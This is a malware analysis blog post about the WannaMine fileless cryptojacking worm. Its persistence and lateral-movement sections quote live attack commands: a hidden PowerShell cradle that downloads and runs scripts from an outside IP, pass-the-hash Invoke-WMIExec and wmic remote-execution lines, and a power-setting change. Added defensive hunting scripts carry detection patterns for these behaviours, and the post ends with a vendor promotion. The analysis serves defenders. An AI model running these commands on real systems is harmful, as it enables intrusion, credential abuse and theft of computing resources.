WannaMine is a sophisticated, file-less cryptojacking worm that primarily utilizes "living-off-the-land" techniques to infect systems and mine Monero cryptocurrency. Unlike traditional malware that relies heavily on writing files to disk, WannaMine operates almost entirely within system memory, leveraging legitimate administrative tools such as PowerShell and Windows Management Instrumentation (WMI) to maintain persistence and execute malicious code.
The infection cycle typically begins via a phishing email containing a malicious batch file or through the exploitation of the EternalBlue vulnerability (MS17-010) on unpatched Server Message Block (SMB) services. Once a system is compromised, the malware establishes persistence by creating malicious WMI event subscriptions, ensuring it automatically re-executes even after a reboot [1].
To propagate across the network, WannaMine employs a multi-staged lateral movement strategy. It first attempts to harvest user credentials (specifically NTLM hashes) from memory using a PowerShell implementation of the Mimikatz tool. If credential theft is successful, it uses WMIExec to remotely execute commands on other networked devices. If credential harvesting fails, the malware falls back to the EternalBlue exploit to compromise vulnerable machines [2]. The ultimate goal is to hijack the CPU resources of infected servers and workstations to mine cryptocurrency, often rendering the devices unusable due to high processor usage.
WannaMine is characterized by its modular architecture and heavy reliance on WMI for both storage and execution. The attack chain involves initial access, persistence, credential harvesting, network scanning, and payload execution.
The attack often initiates through a malicious email attachment or an unpatched SMB vulnerability. Upon execution, the malware spawns a PowerShell process that determines the operating system's architecture (32-bit vs. 64-bit) to download the appropriate payload [1].
powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://45.199.154.147:8000/in6.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://45.199.154.147:8000/in3.ps1')}"
To ensure the infection survives system reboots without leaving traditional file artifacts, WannaMine stores its malicious scripts directly within the WMI database properties. It creates specific WMI classes (e.g., systemcore_Updater, Office_Updater, Win32_Services) and populates their properties with encoded payloads.
The following properties contain the core modules of the malware [2]:
Persistence is triggered using WMI Event Consumers (e.g., SCM Event Log Consumer), which automatically run the stored PowerShell scripts when specific system events occur. Below is an example of a script that executes the cryptominer [1]:
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System <TRUNCATED>
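The persistence mechanism described above leaves two things behind that a defender can enumerate: permanent subscriptions in root\subscription (filter, consumer, binding) and custom classes in root\default whose static property values hold the script modules. The following hunting script is an added example, not code from the original post or from the Cybereason or Sophos write-ups it cites; the keyword list, the 1024-byte size threshold and the function name are assumptions, and the script must run in an elevated PowerShell session to read the subscription namespace.

```powershell
# Added example (not from the original post): hunt for WMI-resident persistence of the
# kind described above. Assumptions: elevated PowerShell 5.1+, keyword list and size
# threshold chosen here, function name Find-WmiPersistence is our own.
function Find-WmiPersistence {
    $findings    = New-Object System.Collections.Generic.List[object]
    $sub         = 'root\subscription'
    $payloadHint = 'powershell|IEX|Invoke-Expression|DownloadString|FromBase64String|\[WmiClass\]'

    # 1. Consumers. CommandLineEventConsumer keeps its command in CommandLineTemplate,
    #    ActiveScriptEventConsumer its script in ScriptText. Querying the abstract
    #    __EventConsumer class returns every derived consumer, so we record the
    #    concrete class too: a stock Windows NTEventLogEventConsumer named
    #    "SCM Event Log Consumer" is normal, a CommandLineEventConsumer by that name is not.
    Get-CimInstance -Namespace $sub -ClassName __EventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object {
            $body = [string]($_.CommandLineTemplate + $_.ScriptText)
            $findings.Add([pscustomobject]@{
                Kind    = 'Consumer'
                Name    = $_.Name
                Class   = $_.CimClass.CimClassName
                Suspect = [bool]($body -match $payloadHint)
                Detail  = $body })
        }

    # 2. Filters. The WQL query decides when the consumer fires; this is what gives
    #    the stored script its reboot survival, so the query text is worth reading.
    Get-CimInstance -Namespace $sub -ClassName __EventFilter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $findings.Add([pscustomobject]@{
                Kind='Filter'; Name=$_.Name; Class='__EventFilter'; Suspect=$false; Detail=$_.Query })
        }

    # 3. Bindings tie a filter to a consumer. Any binding deserves a look on a host that
    #    has no known management agent relying on WMI subscriptions.
    Get-CimInstance -Namespace $sub -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
        ForEach-Object {
            $findings.Add([pscustomobject]@{
                Kind='Binding'; Name=''; Class='__FilterToConsumerBinding'; Suspect=$true
                Detail="$($_.Filter.Name) -> $($_.Consumer.Name)" })
        }

    # 4. Static class properties in root\default. Classes such as the post's
    #    systemcore_Updater / Office_Updater keep their modules in property default
    #    values, which Get-CimClass exposes as CimClassProperties[].Value.
    Get-CimClass -Namespace 'root\default' -ErrorAction SilentlyContinue |
        Where-Object { $_.CimClassName -notlike '__*' } |
        ForEach-Object {
            $cls = $_
            foreach ($prop in $cls.CimClassProperties) {
                $v = $prop.Value
                if ($v -is [string] -and ($v.Length -gt 1024 -or $v -match $payloadHint)) {
                    $findings.Add([pscustomobject]@{
                        Kind='ClassProperty'; Name=$prop.Name; Class=$cls.CimClassName; Suspect=$true
                        Detail=$v.Substring(0, [Math]::Min(160, $v.Length)) })
                }
            }
        }
    return $findings
}

# Usage: suspect entries first; widen to other namespaces if root\default is clean.
Find-WmiPersistence | Sort-Object Suspect -Descending | Format-Table -AutoSize -Wrap
```

Check 4 is the one that matters most for this family: a filter/consumer pair can look innocuous while the payload lives in a class property that never appears in the subscription namespace at all. Compare the output against a known-good host of the same build before acting on it, since some management products legitimately register subscriptions.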
To identify viable targets, the malware utilizes code derived from the PingCastle scanner. This component maps the network and identifies the shortest path to exploitable machines via SMB.
WannaMine employs a dual strategy for spreading to other hosts on the network:
The malware loads the mimi module (Mimikatz) into memory to extract NTLM hashes or clear-text passwords. If a Domain Administrator's hash is recovered, the malware utilizes Invoke-WMIExec to launch attacks against other IP addresses found on the network.
Examples of lateral movement commands using harvested credentials [2]:
Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 <<command>>
wmic /NODE:"VIKAS-PC" /USER:"vikas.singh" /PASSWORD:"MyPoorPassword" process call create "powershell.exe -Command {IEX (New-Object Net.WebClient).DownloadString('http://192.168.110.141/Payload.ps1')}"
If credential-based movement fails, the malware utilizes the funs module to deploy the EternalBlue exploit against unpatched machines [2].
Once established, the malware configures the system for maximum mining efficiency. It alters power management settings to prevent the computer from entering sleep mode [1]:
C:\Windows\system32\powercfg.exe /CHANGE -standby-timeout-ac 0
The malware also actively eliminates competition. It scans for and terminates processes connected to standard mining ports (3333, 5555, 7777), while its own miner operates on port 14444 [1].
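The behaviours described in the preceding sections are all observable on a live host: the hidden, non-interactive PowerShell download cradle, shells spawned through remote WMI execution (on the receiving end, the child process hangs off WmiPrvSE.exe), established connections to the miner ports listed above, and an AC standby timeout forced to zero. The triage function below is an added example, not code from the original post or the referenced write-ups; the port list comes from the post, while the regex, the function name and the reliance on English powercfg output are assumptions. It needs an elevated PowerShell 5.1+ session on Windows 8/Server 2012 or later for Get-NetTCPConnection.

```powershell
# Added example (not from the original post): single-host triage for the WannaMine
# behaviours described above. Assumptions: elevated PowerShell 5.1+, English-locale
# powercfg output, regex and function name chosen here.
function Invoke-WannaMineTriage {
    $findings   = New-Object System.Collections.Generic.List[object]
    $cradle     = '-NoP.*-W\s+Hidden|DownloadString|IEX\s*\(|Invoke-Expression|\[WmiClass\]'
    $minerPorts = 3333, 5555, 7777, 14444   # ports named in the post; extend with your own intel

    # Index processes by PID so parents can be resolved; keys cast to [int] because
    # Win32_Process uses UInt32 and Get-NetTCPConnection's OwningProcess does not
    # compare equal to it as a hashtable key.
    $procs = Get-CimInstance Win32_Process
    $byId  = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }

    foreach ($p in $procs) {
        $cmd = [string]$p.CommandLine
        # 1. hidden PowerShell with a download cradle, as in the architecture-check one-liner
        if ($p.Name -match '^powershell(\.exe)?$' -and $cmd -match $cradle) {
            $findings.Add([pscustomobject]@{ Check='PowerShellCradle'; Pid=$p.ProcessId; Detail=$cmd })
        }
        # 2. shell whose parent is WmiPrvSE.exe: what Invoke-WMIExec or
        #    "wmic ... process call create" looks like on the target host
        $parent = $byId[[int]$p.ParentProcessId]
        if ($parent -and $parent.Name -eq 'WmiPrvSE.exe' -and $p.Name -match '^(powershell|cmd)(\.exe)?$') {
            $findings.Add([pscustomobject]@{ Check='WmiSpawnedShell'; Pid=$p.ProcessId; Detail=$cmd })
        }
    }

    # 3. established connections to the stratum/miner ports (both the competing miners
    #    WannaMine kills and its own 14444 listener's peers)
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $minerPorts -contains $_.RemotePort } |
        ForEach-Object {
            $owner = $byId[[int]$_.OwningProcess]
            $findings.Add([pscustomobject]@{
                Check='MinerPort'; Pid=$_.OwningProcess
                Detail="$($owner.Name) -> $($_.RemoteAddress):$($_.RemotePort)" })
        }

    # 4. sleep disabled: the powercfg change above shows up as an AC index of 0x00000000
    $ac = powercfg /QUERY SCHEME_CURRENT SUB_SLEEP STANDBYIDLE 2>$null |
          Select-String 'Current AC Power Setting Index:\s*0x([0-9a-fA-F]+)' |
          Select-Object -First 1
    if ($ac -and [Convert]::ToInt32($ac.Matches[0].Groups[1].Value, 16) -eq 0) {
        $findings.Add([pscustomobject]@{ Check='StandbyDisabled'; Pid=$null; Detail='AC standby timeout is 0' })
    }
    return $findings
}

# Usage: run once per suspect host; an empty result does not rule out a dormant subscription.
Invoke-WannaMineTriage | Format-Table -AutoSize -Wrap
```

Checks 1 and 2 only see what is running at the moment the script executes, which is why they are paired with the WMI subscription hunt rather than used alone; check 4 is a configuration fact and survives even after the miner process has exited, making it a useful corroborating artefact on servers where sleep would never have been disabled deliberately.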
We also strongly suggest simulating WannaMine Malware Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the WannaMine Malware Attacks:
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 39833 | WannaMine Malware Campaign | Windows Endpoint |
| 76122 | WannaMine Trojan Email Threat | E-mail Infiltration |
| 49678 | WannaMine Trojan Download Threat | Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] C. Nocturnus, “WannaMine Cryptominer that uses EternalBlue still active.” Accessed: Jan. 11, 2026. [Online]. Available: https://www.cybereason.com/blog/research/wannamine-cryptominer-eternalblue-wannacry
[2] “Service and Support.” Accessed: Jan. 11, 2026. [Online]. Available: https://support.sophos.com/support/s/article/KBA-000005976?language=en_US